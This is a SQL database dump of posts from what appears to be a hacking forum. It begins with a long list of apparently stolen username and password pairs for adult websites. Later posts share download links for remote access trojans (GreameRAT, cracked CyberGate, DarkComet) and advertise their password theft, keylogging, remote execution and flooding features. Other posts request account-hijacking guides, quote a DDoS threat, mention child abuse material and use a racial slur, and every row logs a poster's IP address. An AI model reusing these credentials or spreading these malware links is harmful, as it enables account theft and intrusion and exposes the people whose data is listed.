members.jp18.com pswcompliance 3kH07nvz lisadergan.com dposton fahayek eurofucktrip.org graysc trimner polishbustyxxl.com natasha zolushka5 guysluckyday.ws maveri9243 username bigtitsroundasses.bangbros.com kobrey mykids22 members.herfirstdick.com millkev2 wf5a2345 shockathome.com joachim1 empire1 lisadergan.com p2mask2y amasados clublove.com kpc955 555555 brutaldildos.com blippo10 Lance1 members.sclorch.com all4u2c happynow blacksonblondes.com shminty 170111 trannypartygirls.com 1sadie 1buddy dumbandhorny.com prince nbvcxw realitypasswords.com rabitt2005 130470 members.triplexmembers.com jimh j082749h eangirls.com foodking sierra members.nebraskacoeds.com dooley03 chicken0 summergf.com kitana1 john daily-desktops.com elysium atheling watchmygf.com stonie roman rachel18.com lalala 123456 realgfstube.com hotstuff pencil blacksonblondes.com kstromse joFQ5rjR atkarchives.com 48502297 bob743 facialsz.com aw55tq8n jjjjjj sexmaidens.com bassingwell bassingwe clublove.com jarao iyaoyas members.collegefucktour.com morgan solomon young-men.com h4x0r3d 4zealots members.orgyfantasy.com klocek damiana christilake.com goskier junker lisadergan.com upsben benups daddy-videos.net jordanf degnan mikesapartmentonline.com nena nena brazilxxx.com zeus00 hercules watchmygf.com metoo busty polishbustyxxl.com forxxxhq birthday27 auth.redclouds.com 29031996 comein members.uncensoredextreme.com jffleft heres watchmygf.com greedmnt hammer cleavagelovers.com vickie vickie supermodeltits.com larryd aolban hotlegsandfeet.com datapage produc mynonnudegf.com triko chowe mybbwgf.com raiser peters guysluckyday.ws gumby27 pokey members.hentaifactory.nu techman 777777 rachel18.com DJMANNY 123456 watchmygf.com johnl 18teen tiffanytaylor.com fenwayl 340000 members.ksexradio.com warlock1935 churin burningangel.com stevostheman billabon members.orgyfantasy.com oilme brandy blacksonblondes.com qwerty asdfg daily-desktops.com rquaglia quags21 willsheexplode.com tull panic videosz.com kekko radical echojohnson.net gherbe sterling blacksonblondes.com tltwin tonkatl stacys-dungeon.com itstime torock polishbustyxxl.com traxis praxis collegerules.com LBB rebate chloevevrier.com dondolon 000321 nudebeachpix.com opopop11 sonyfuck members.nebraskacoeds.com phish715 spencer members.hentaifactory.nu qbert alive members.simplyamateur.com shanghaijun 71864517 daily-desktops.com frozen_bootleg escupido sextoon.com 04279238 2547972 members.ksexradio.com ahr 943 babylonxxx.com BADBEE Blue mikesapartmentonline.com brendan allison isabellasstockings.com forxxxhq birthday103 assparade.bangbros.com drefly 2751223', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'eff8f26282fe7bdae10cf6aa1a120ced', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4153', '793', '4150', '9', 'RE: How To Make $5+ A Hour | Even Your Grandma Can Do It', '0', '228', 'VirtualLegend', '1349884989', '[quote=\'sirchamp\' pid=\'4150\' dateline=\'1349883068\'] Firstly this method already has been posted.(http://l33thacking.net/thread-773.html) This works in every country but you cant make money in every country with it. It only has good offers for the USA and the Uk. [/quote] Firstly i wasn´t aware that the method already was posted. I Just want people to make money. I want to help the Money making community. Thanks for the feedback', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2075fbed26aa2e379623e385b05a9ad8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4154', '795', '0', '15', 'GreameRAT 1.5', '0', '203', 'NeonLights', '1349886893', '[align=center][img]http://desmond.imageshack.us/Himg507/scaled.php?server=507&filename=image1ka.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg211/scaled.php?server=211&filename=image2lm.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg198/scaled.php?server=198&filename=image3gs.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg15/scaled.php?server=15&filename=image4ml.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg210/scaled.php?server=210&filename=image5ow.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg28/scaled.php?server=28&filename=image6en.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg831/scaled.php?server=831&filename=iamge7.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg641/scaled.php?server=641&filename=iamge8.png&res=landing[/img] [img]http://desmond.imageshack.us/Himg560/scaled.php?server=560&filename=image9oa.png&res=landing[/img] Available functions: Client Options - Change the interface (skins) - Dektop, Webcam an Audio Start Auto... - and more... Server Options - Uninstall - Disconnect - Update and more... Extra options - Passwords (Internet Explorer, Opera, Chrome, MSN, and others) - Open website - Run commands - Send files and run - Download and run - Proxy (http and https) - and more... File Manager - List files (with information on each) - Preview image - Set wallpaper - Search files on your computer - and more... Process Manager - List active processes (with information on each) - Kill or pause processes - and more... Window Manager - List active windows (with information on each) - Close, minimize, restore, change window title - and more... Services Manager - List installed services (with information on each) - Install - Uninstall - and more... Registry Manager - Works as Windows Regedit - Delete keys - Create keys - Manage StartUp programs - and more... Clipboard Manager - Manages the contents of the clipboard (text and files) of the computer (Ctrl + C) Devices list - Shows all devices available on the computer Active ports - List active connections (with information on each) - Kill connections - and more... Command Prompt - Works like DOS windows Miscellaneous - Restart, Shutdown and Log Off Windows - Open and close CD / DVD - Pause mouse - and more... CHAT - Talk directly to another computer MSN - Change MSN status ... And more, more, more... [lock] download: http://ge.tt/2XeVlDN/v/0 ZipPass: 753 [/lock] virus scan: https://www.virustotal.com/file/1a0ad84f2893923b4f97053629200bd5bc06b75abd661fa25354627899556119/analysis/ its safe u can ask lester to check it for you :P hope u guys enjoyed :)[/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352011037', '1', '73bffc285099c1f458083f5bf7d4a68f', '0', '1352011037'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4155', '796', '0', '15', 'CyberGate v1.18.0 Full Version Cracked', '0', '203', 'NeonLights', '1349886978', '[align=center][img]http://up.arab-x.com/Dec10/RCx68008.png[/img] CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. CyberGate RAT was built to be a tool for various possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access. site official : http://www.cyber-software.org/website [lock] Download CyberGate v1.18.0 Full Version Cracked : http://adf.ly/382489/https://www.dropbox.com/s/wi6l96rs006p1hw/CyberGate_v1.18.0%20-%20Crack%20Version%20By%20FreeHackToolsCom.rar OR mirror: http://adf.ly/382489/http://lh.rs/vQNTfjcP8vQ4 [/lock] run the loader NOT THE TRIAL! [/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352011056', '1', 'fa98d1ef8ae98fa57cf7fd8419ee4deb', '0', '1352011056'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4156', '797', '0', '15', 'DarkComet RAT v5.3.1', '0', '203', 'NeonLights', '1349887047', '[align=center][img]http://viprasys.org/xfs/image/direct/xLLpiu2Dky/darkcomet-5.3.1.png[/img] Latest stable version. ( Release date : 04/06/2012 at 20:04 ) Product version : v 5.3.1 FIX 1 fwb Directed and Coded by : Jean-Pierre LESUEUR ( DarkCoderSc ) Coded using : Pascal / Delphi ; Assembler x86 ; PHP (Trace route; get IP WAN) [Curent Changes 5.3] - [FIX ] HTTP Flood more efficient - [FIX ] In settings the last theme is correctly set in the combobox - [FIX ] Auto SIN Refresh ratio successfully saved in config.ini - [GUI ] Client Settings GUI changed, it is now more user friendly and fit with the rest of DarkComet RAT Design - [GUI ] EULA At startup is more beautiful - [GUI ] No IP Gui revised - [GUI ] User group Gui revised - [FUNC] Search for update added in settings - [GUI ] Keylogger GUI revised - [FIX ] Now desktop correctly save snapshots (if option enabled) - [DEL ] Delete in full editor (read only, archived, tempory) attributes to avoid some stub problems if used - [FIX ] Users list flags support now Serbia Country (Republic of Serbia) - [FIX ] VIP Lounge price and URL fixed - [FUNC] HOT, Now you can chose wich functions you need in the control center, and not be bloated with functions you might never used. (In settings window) - [FIX ] FTP Upload Keylogger Logs bug fixed - [FUNC] FTP Wallet added in settings, it allow you to setup and test your FTP accounts for compatible DarkComet RAT FTP Functions - [FUNC] FTP Wallet is now linked to the Edit Server keylogger FTP Managment - [FUNC] Now you can upload files from file manager to one of your FTP account (compatible with the FTP Wallet) - [FUNC] Embedded FTP Client added to DarkComet, multithread using Pure API, very fast and reliable and of course user friendly. - [FIX ] Bug fixed when module startup enable, no more tons of process on reboot etc.. support Drag n Drop - [FUNC] Drag And Drop added in File Manager to upload files frop explorer directly to remote computer - [FUNC] New downloader method implemented using Pure low level API\'s instead of the **** URLDownloadUrlToFile bloated of crap - [FUNC] File Downloader manager from control center been improved and bug fixed, now file are correctly downloaded, also you can chose a PATH from combobox shortcut - [FUNC] Mass downloader from user list been improved and multithreaded, also download bug is now fixed - [FUNC] Same as for mass downloader, update from URL bug fixed and improved [lock]download: http://adf.ly/382489/http://ge.tt/15P04kN/v/0?c[/lock][/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352011006', '1', '646ee5f0a2f8d2ee7c0151f4cdb929a7', '0', '1352011006'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4178', '729', '4133', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349909426', '[quote=\'mothered\' pid=\'4133\' dateline=\'1349870117\'] I don\'t use Skype, but shall forward this Info to friends. Thanks for the heads up mate. [/quote] No problem man, Just dont want anyone getting infected.', '75.38.19.52', '1260786484', '1', '0', '3', '1349909444', '1', '621963543f93f0f0a22a7e03b19a9015', '0', '1349909444'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4179', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '232', 'BreShiE', '1349909600', 'All applicants will be contacted shortly.', '78.149.60.37', '1318403109', '1', '0', '0', '0', '1', '91d538046b14a6cec44b530ab60573a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4182', '788', '4130', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1349911920', '[quote=\'iTzIpod\' pid=\'4130\' dateline=\'1349868202\'] That nigga named Theodore Bagwell... Didn\'t he die? [/quote] I don\'t know but I\'m by the part when he gets fucked up by the Feds in the van and Mahone etc find a post it note. [quote=\'??????????¢™\' pid=\'4176\' dateline=\'1349909098\'] [quote=\'t3h jok3r\' pid=\'4122\' dateline=\'1349843007\'] [quote=\'??????????¢™\' pid=\'4119\' dateline=\'1349842486\'] Yep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists. [/quote] :roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up. I agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards. [/quote] LOL You laughed because I said \"Thanks to everyone except Anarchists.\" Huh? [/quote] Yeah that\'s the part I found funny and he did help us with 20 threads.', '72.231.24.165', '1223104677', '1', '0', '1', '1349911976', '1', '544bfb866eb2a3da9dd3b624e734c712', '0', '1349911976'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4181', '796', '4155', '15', 'RE: CyberGate v1.18.0 Full Version Cracked', '0', '100', '??zg???g????61', '1349910466', 'Thanks neon awesome thread ;)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '6029e7b99b7db767cf59a414cd92d4a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4183', '788', '4182', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349912480', '[quote=\'t3h jok3r\' pid=\'4182\' dateline=\'1349911920\'] [quote=\'iTzIpod\' pid=\'4130\' dateline=\'1349868202\'] That nigga named Theodore Bagwell... Didn\'t he die? [/quote] I don\'t know but I\'m by the part when he gets fucked up by the Feds in the van and Mahone etc find a post it note. [quote=\'??????????¢™\' pid=\'4176\' dateline=\'1349909098\'] [quote=\'t3h jok3r\' pid=\'4122\' dateline=\'1349843007\'] [quote=\'??????????¢™\' pid=\'4119\' dateline=\'1349842486\'] Yep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists. [/quote] :roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up. I agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards. [/quote] LOL You laughed because I said \"Thanks to everyone except Anarchists.\" Huh? [/quote] Yeah that\'s the part I found funny and he did help us with 20 threads. [/quote] I know but I dont like him thats why.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '842e6780608ecc64f678f7371721d4d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4184', '802', '0', '77', 'MW3 Knockback Lobby | FREE', '0', '3', '??????????¢™', '1349913454', '[b]Hello guys, I am hosting a MW3 knockback lobby on the xbox 360. If you would like to join just message the gamertag that will be at the bottom and I will invite you.[/b] [b][align=center][size=large][color=#FFD700]Status:[/color][/size][/align][/b] [b][align=center][size=large][color=#32CD32]Online/Open[/color][/size][/align][/b] [b][align=center][size=medium][color=#FFD700]GT: iPownaholic[/color][/size][/align][/b]', '75.38.19.52', '1260786484', '1', '0', '3', '1349913650', '1', '07807f2d06895705a22c1c7842de33c5', '0', '1349913650'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4185', '776', '4012', '16', 'RE: What are some things you want SE\'d?', '0', '61', 'NXK', '1349917955', 'This keyboard so bad aha http://www.razerzone.com/ca-en/store/razer-deathstalker-ultimate I can\'t get it, I\'m always declined -_-', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '7e26366fd42a12c72fde24d181bfb2a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4192', '779', '4023', '61', 'RE: Get everything for FREE', '0', '5', 'Timmy', '1349920588', 'When you mentioned Saga i knew which ebook you are talking about. I learned seing with his ebook very useful.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e22bfea9234fb0dd18e9ec6c7c8b65fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4193', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '5', 'Timmy', '1349920665', 'After reading what Jok3r posted its your fault.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6283f9d50b991e59561b166c7b59af21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4194', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '222', 'Exposé', '1349920691', 'Lol I kicked you after you said you were done. I didn\'t kick you for no reason (facepalm)', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '123b759ddea7c334a794616cc7d960d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4195', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '5', 'Timmy', '1349920714', 'Brilliant idea and now that this group is invite only this group will succeed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9b7d28ffb40f26810981c24ca963172c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4196', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '5', 'Timmy', '1349920787', 'Jok3r: Yeah baby Timmy: Yeah sugar Lets make it to 5k posts now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2e749701885cff7a780c83c41aa87d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4197', '791', '4134', '7', 'RE: Are you a morning person?', '0', '5', 'Timmy', '1349920985', 'Same here. Even if I sleep at 9 PM and wake up at 7 AM I can\'t get up even though it\'s more than or equal to 10 hours sleep I still can\'t get up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49a2062422a0f19f9ff414f4d0d2ab8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4198', '776', '4191', '16', 'RE: What are some things you want SE\'d?', '0', '5', 'Timmy', '1349921362', 'How about SEing companies or hacking accounts through SEing [quote=\'NXK\' pid=\'4191\' dateline=\'1349920231\'] [quote=\'t3h jok3r\' pid=\'4190\' dateline=\'1349919919\'] There\'s nothing that I want SE\'d at the moment but maybe you can create a guide on SEing phones. [/quote] Hmm I\'ve done this before, ill think about making a guide for this over the weekend. [/quote] Awesome i need this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f49e77614358f520ae141ef94118ed9a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4199', '673', '4142', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '5', 'Timmy', '1349921461', '[quote=\'sirchamp\' pid=\'4142\' dateline=\'1349873517\'] Already knew this. You can also watch kids porn there. [/quote] But isn\'t it too slow when you are accessing deep web?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ad9c17b0606349b53320dae212a1ca84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4200', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '5', 'Timmy', '1349921631', 'Aight firstly I junked it myself so stop bugging out and update the thread. If you want something removed you contact staff', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '158e61d11c70603c86de3e89a3b436ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4201', '769', '3944', '23', 'RE: Math Tools for all Subjects Cracked by Rave', '0', '10', 'swa4567', '1349921767', 'Wow you crack programs thats so cool and is this the right section?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9ea4b784529ceca77d213c5568b552bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4202', '801', '4177', '7', 'RE: [IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '1', 't3h jok3r', '1349922749', 'If it is basically money for video gaming then why is it so popular?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd3db1485cf91b214d9c21d78202278ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4203', '190', '665', '56', 'RE: Copy and paste game', '0', '10', 'swa4567', '1349922826', 'http://www.anarchyforums.net/Thread-lets-all-betray-l33tshacking-net-im-neonlights-from-there-forum-time-to-act Copied that when someone told us on Skype that Neon left and joined AF.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a9cb22135ed72741f7df2909980eac1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4204', '487', '2354', '56', 'RE: Corrupt a wish', '0', '10', 'swa4567', '1349922872', 'Granted but then your own kids would fight for property and take all your money away I wish I had 1 billion dollars.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3a2a8a3023ed07e3fb0f0c394173128e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4205', '197', '696', '56', 'RE: /me Thread', '0', '10', 'swa4567', '1349922926', '/me asks ipod what COD are you playing', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0966be6ee040449d79959b47e7689d40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4206', '238', '1021', '56', 'RE: Ban the user above you', '0', '10', 'swa4567', '1349922980', 'Banned because you have a win a netflix account contest.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a10e331f3cd3a0930ee2f41be77082cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4207', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '10', 'swa4567', '1349923048', 'No no no i win because i\'m unique', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1f4a10d4f1a2c67e504aa2fa0d09549f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4208', '253', '1106', '56', 'RE: Count to 200', '0', '10', 'swa4567', '1349923081', '52. Bumping this thread up.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '78fa5190308deeee27e91e2ee7e6cea4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4209', '804', '0', '42', 'Ninja caught in US Airport', '0', '10', 'swa4567', '1349923699', 'Watch video at: http://news.yahoo.com/video#video=30830518 A Boston-bound man wearing body armor, flame retardant leggings and knee pads under his trench coat arrested at Los Angeles International Airport after a Customs and Border Protection officer found a smoke grenade and several weapons in his checked luggage is facing a federal charge for transporting hazardous material on an airplane. According to an affidavit filed in federal court, Yongda Huang Harris, 28, a naturalized U.S. citizen of Chinese descent, was flying from Kansai, Japan, via Inchon, Korea, to LAX on Friday. He was pulled aside in customs for a secondary baggage inspection when an officer noticed Harris was wearing a bullet-proof vest. The officer asked Harris if he had anything he would like to declare in his checked luggage. Harris told the officer he had a knife, but when his bag was searched, the officer found a troubling array of suspicious items. In addition to the smoke grenade, officers found three leather-coated black-jack billy clubs, a collapsible baton, a full-face respirator, several knives and a hatchet. Perhaps even more disturbing, officers also found body bags, a tyvex biohazard suit, various masks, duct tape, hand cuffs, leg irons, flex cuffs, oven mitts and cooking tongs. The smoke grenade, manufactured by a company called Commando, is classified as an explosive and is capable of filling a 40,000-cubic-foot space with smoke, according to the affidavit. The grenade is also capable of causing a fire. It is not clear why Harris had those items in his luggage, but the investigation is ongoing. Authorities say they are working with investigators in Japan, where Harris has been living, to learn more about why he would bring such an alarming assortment of implements on board an international flight. LAPD and FBI are assisting in the investigation.', '72.231.24.165', '1223104677', '0', '0', '10', '1349923780', '1', 'cacaf0f507bac8304a4f30457ca298f5', '0', '1349923780'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4210', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '61', 'NXK', '1349924470', 'You\'re so LQ anyways, No one really cares.. But you threaten to DDoS us. Which was a wrong move on your choice, You know what was to come. \"ddos request sent to multiple areas wanna join in? wanna take them down? lets do it ! if ur interested in attacking there forum for betraying us and most of the cybernet then leave a reply im tired of them...\"', '99.253.94.204', '1677549260', '1', '0', '61', '1349925743', '1', '9caef4e8dd306a69ac8102d3720fae6c', '0', '1349925743'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4211', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '1', 't3h jok3r', '1349924837', 'Right move, thanks for taking immediate action NXK.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '645176c0eeb19052543f061b7f40e9b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4212', '791', '4151', '7', 'RE: Are you a morning person?', '0', '205', 'mothered', '1349928043', '[quote=\'NXK\' pid=\'4151\' dateline=\'1349883297\'] You\'re exactly like me, that\'s why I just gave up on going to bed early, I go to sleep ay like 1am everyday and wake up at 6am daily.. My first 2 classes are hell. [/quote] I used to sleep very similar hours, but It does tend to catch up with you. I try and sleep 